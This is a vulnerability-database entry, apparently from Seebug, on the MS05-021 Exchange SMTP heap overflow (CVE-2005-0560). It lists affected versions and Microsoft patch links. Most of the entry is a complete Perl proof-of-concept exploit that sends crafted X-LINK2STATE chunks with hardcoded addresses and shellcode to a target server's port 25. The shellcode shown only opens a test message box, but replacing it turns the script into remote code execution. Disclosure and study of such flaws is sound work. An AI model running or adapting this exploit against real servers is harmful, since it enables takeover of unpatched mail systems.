MS Exchange Server Remote Code Execution Exploit (MS05-021)

基本字段

漏洞编号：: SSV-13682

披露/发现时间：: 2005-05-02

提交时间：: 2005-04-19

漏洞等级：

漏洞类别：: 代码执行

影响组件：: Microsoft Exchange
Microsoft Exchange Server
Microsoft Exchange 2003

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2005-0560

CNNVD-ID：: CNNVD-200505-527

CNVD-ID：: CNVD-2005-0869

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

漏洞描述：Microsoft Exchange是一款由微软开发的邮件服务程序。Microsoft Exchange Server中存在缓冲区溢出漏洞，攻击者可能利用此漏洞在主机上执行任意指令。起因是Exchange SMTP Server在处理特殊的扩展SMTP verb时存在缓冲区溢出。漏洞可能允许攻击者连接到Exchange服务器的SMTP端口并发送精心构造的恶意命令，这些命令可能导致拒绝服务或以SMTP服务进程的权限运行攻击者所选择的代码。漏洞影响：受影响的软件： •Microsoft Exchange Server 2000 Service Pack 3 •Microsoft Exchange Server 2003 •Microsoft Exchange Server 2003 Service Pack 1 不受影响的软件：•Microsoft Exchange Server 5.5 Service Pack 4•Microsoft Exchange Server 5.0 Service Pack 2CVE-ID：CVE-2005-0560 CNNVD-ID：CNNVD-200505-527CNVD-ID：CNVD-2005-0869 解决方案：Microsoft --------- Microsoft已经为此发布了一个安全公告（MS05-021）以及相应补丁:MS05-021：Vulnerability in Exchange Server Could Allow Remote Code Execution (894549)链接：<a href="http://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx">http://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx</a>补丁下载：Microsoft Exchange 2000 Server Service Pack 3 - <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66">http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66</a> Microsoft Exchange Server 2003 ？C  <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267">http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267</a> Microsoft Exchange Server 2003 Service Pack ？C <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC">http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC</a>

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

#!/bin/perl # # # MS05-021 Exchange X-LINK2STATE Heap Overflow # Author: Evgeny Pinchuk # For educational purposes only. # # Tested on: # Windows 2000 Server SP4 EN # Microsoft Exchange 2000 SP3 # # Thanks and greets: # Halvar Flake (thx for the right directions) # Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins # # use IO::Socket::INET; my $host = shift(@ARGV); my $port = 25; my $reply; my $request; my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll) my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter my $JMP="\xEB\x10"; my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xD5\x01" . "\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x5F" . "\x0C\x59\x7C\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0D\x31\xd2\x52\x51" . "\x51\x52\xff\xd0\x31\xd2\x50\xb8\x72\x69\x59\x7C\xff\xd0\xe8\xc4\xff" . "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" . "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" . "\xff\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x73\x74\x4e"; my $cmd="X-LINK2STATE CHUNK="; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "EHLO\r\n"; send $socket, $request, 0; print "[+] Sent EHLO\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = $cmd . "A"x1000 . "\r\n"; send $socket, $request, 0; print "[+] Sent 1st chunk\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC; my $left=1000-length($request); $request = $request . "C"x$left; $request = $cmd . $request . "\r\n"; send $socket, $request, 0; print "[+] Sent 2nd chunk\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; close $socket; $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "EHLO\r\n"; send $socket, $request, 0; print "[+] Sent EHLO\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = $cmd . "A"x1000 . "\r\n"; send $socket, $request, 0; print "[+] Sent 3rd chunk\n"; close $socket; # sebug.net